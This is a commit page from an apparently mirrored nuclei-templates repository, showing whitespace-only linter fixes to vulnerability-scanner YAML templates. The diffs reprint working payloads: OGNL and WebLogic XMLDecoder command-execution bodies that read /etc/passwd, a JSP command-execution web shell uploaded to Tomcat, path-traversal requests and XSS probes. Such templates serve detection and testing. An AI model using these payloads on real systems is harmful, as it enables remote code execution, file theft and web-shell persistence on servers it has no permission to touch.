daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Satisfying the linter (all errors and warnings) 

* whitespace modifications only
patch-1
forgedhallpass 2021-08-19 17:44:46 +03:00
parent 2a320412bf
commit 77103bc629
140 changed files with 543 additions and 543 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
cnvd/CNVD-2021-30167.yaml
View File

@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:

2
cves/2007/CVE-2007-4556.yaml
View File

@ -15,7 +15,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:

8
cves/2012/CVE-2012-1835.yaml
View File

@ -12,10 +12,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:

2
cves/2013/CVE-2013-1965.yaml
View File

@ -15,7 +15,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:

4
cves/2013/CVE-2013-3827.yaml
View File

@ -7,8 +7,8 @@ info:
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
requests:
- method: GET

4
cves/2013/CVE-2013-7240.yaml
View File

@ -6,8 +6,8 @@ info:
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
requests:

4
cves/2014/CVE-2014-4210.yaml
View File

@ -6,8 +6,8 @@ info:
severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
requests:
- method: GET

2
cves/2015/CVE-2015-2080.yaml
View File

@ -9,7 +9,7 @@ info:
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests:

36
cves/2015/CVE-2015-3337.yaml
View File

@ -1,25 +1,25 @@
id: CVE-2015-3337
info:
name: Elasticsearch Head plugin LFI
author: pdteam
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference: https://www.exploit-db.com/exploits/37054/
tags: cve,cve2015,elastic,lfi
name: Elasticsearch Head plugin LFI
author: pdteam
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference: https://www.exploit-db.com/exploits/37054/
tags: cve,cve2015,elastic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
- method: GET
path:
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200
- type: status
status:
- 200

40
cves/2015/CVE-2015-5688.yaml
View File

@ -1,27 +1,27 @@
id: CVE-2015-5688
info:
name: Geddy before v13.0.8 LFI
author: pikpikcu
severity: high
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference:
- https://nodesecurity.io/advisories/geddy-directory-traversal
- https://github.com/geddy/geddy/issues/697
tags: cve,cve2015,geddy,lfi
name: Geddy before v13.0.8 LFI
author: pikpikcu
severity: high
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference:
- https://nodesecurity.io/advisories/geddy-directory-traversal
- https://github.com/geddy/geddy/issues/697
tags: cve,cve2015,geddy,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200
- type: status
status:
- 200

4
cves/2015/CVE-2015-7823.yaml
View File

@ -5,8 +5,8 @@ info:
author: 0x_Akoko
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
reference:
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823
severity: low
tags: cve,cve2015,kentico,redirect

4
cves/2016/CVE-2016-2004.yaml
View File

@ -7,8 +7,8 @@ info:
tags: cve,cve2016,network,iot,hp,rce
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference:
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
network:
- inputs:

36
cves/2017/CVE-2017-1000028.yaml
View File

@ -1,24 +1,24 @@
id: CVE-2017-1000028
info:
name: GlassFish LFI
author: pikpikcu
severity: high
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
reference: https://www.exploit-db.com/exploits/45196
tags: cve,cve2017,oracle,glassfish,lfi
name: GlassFish LFI
author: pikpikcu
severity: high
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
reference: https://www.exploit-db.com/exploits/45196
tags: cve,cve2017,oracle,glassfish,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "/sbin/nologin"
part: body
- method: GET
path:
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "/sbin/nologin"
part: body
- type: status
status:
- 200
- type: status
status:
- 200

8
cves/2017/CVE-2017-1000486.yaml
View File

@ -6,10 +6,10 @@ info:
severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
reference:
- https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
- https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce
requests:

90
cves/2017/CVE-2017-10271.yaml
View File

@ -13,52 +13,52 @@ info:
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: regex

6
cves/2017/CVE-2017-12149.yaml
View File

@ -6,9 +6,9 @@ info:
severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization
requests:

4
cves/2017/CVE-2017-12542.yaml
View File

@ -6,8 +6,8 @@ info:
severity: critical
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://www.exploit-db.com/exploits/44005
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://www.exploit-db.com/exploits/44005
tags: cve,cve2017,ilo4,hpe
requests:

38
cves/2017/CVE-2017-12615.yaml
View File

@ -7,10 +7,10 @@ info:
tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests:
- method: PUT
@ -19,21 +19,21 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
- method: GET
path:

8
cves/2017/CVE-2017-12629.yaml
View File

@ -6,10 +6,10 @@ info:
severity: critical
tags: cve,cve2017,solr,apache,oob,xxe
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests:
- raw:

6
cves/2017/CVE-2017-12637.yaml
View File

@ -7,9 +7,9 @@ info:
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi
reference:
- https://www.cvedetails.com/cve/CVE-2017-12637/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
- https://www.cvedetails.com/cve/CVE-2017-12637/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
requests:
- method: GET

4
cves/2017/CVE-2017-14535.yaml
View File

@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
requests:

6
cves/2017/CVE-2017-14537.yaml
View File

@ -7,9 +7,9 @@ info:
tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
requests:
- raw:

4
cves/2017/CVE-2017-15944.yaml
View File

@ -4,8 +4,8 @@ info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab,milo2012
reference:
- https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto,globalprotect

4
cves/2017/CVE-2017-3506.yaml
View File

@ -7,8 +7,8 @@ info:
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:

4
cves/2017/CVE-2017-3528.yaml
View File

@ -5,8 +5,8 @@ info:
author: 0x_Akoko
severity: low
reference:
- https://blog.zsec.uk/cve-2017-3528/
